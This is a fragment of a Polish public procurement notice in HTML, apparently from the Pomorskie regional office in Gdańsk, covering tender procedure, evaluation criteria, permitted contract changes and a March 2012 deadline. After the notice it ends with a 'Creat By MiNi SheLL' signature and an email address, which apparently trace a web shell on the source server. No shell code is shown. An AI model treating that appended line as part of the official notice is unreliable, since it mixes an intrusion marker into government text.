6. Zgodnie z art. 26 ust. 2b ustawy Prawo zamówień publicznych Wykonawca może polegać na 	wiedzy  i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go i nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zamawiający dopuszcza możliwość dokonania zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, w następujących przypadkach: 
1)	organizacji prac,
2)	harmonogramu prac,
3)	terminów płatności,
4)	obniżenia  cen usług, wymienionych w § 5 ust. 6 pkt 1, 2, 3 projektu Umowy.
2. Zmiany, o których mowa w ust. 1 mogą nastąpić jedynie w uzasadnionych przypadkach,  w szczególności:
	1)	w przypadku wystąpienia siły wyższej. Pod pojęciem siły wyższej Zamawiający 	rozumie okoliczności, które pomimo zachowania należytej staranności są 	nieprzewidywalne oraz, którym nie można zapobiec lub przeciwstawić się skutecznie. 	O braku możliwości dotrzymania terminu Wykonawca obowiązany jest niezwłocznie 	powiadomić Zamawiającego, określając jednocześnie nowy termin realizacji 	zamówienia, 
	2)	gdy zaistniały okoliczności, których nie można było przewidzieć przy zawarciu umowy,
	3)	gdy zmiany te są korzystne dla Zamawiającego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pomorskie.eu<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd  Marszałkowski Województwa Pomorskiego  ul. Okopowa 21/27, 80-810 Gdańsk.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.03.2012 godzina 11:30, miejsce: Kancelaria Ogólna Urzędu  Marszałkowskiego Województwa Pomorskiego             ul. Okopowa 21/27, 80-810 Gdańsk, pokój nr  4a, w dni robocze: od poniedziałku do piątku od godz. 7.45 do godz. 15.45..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com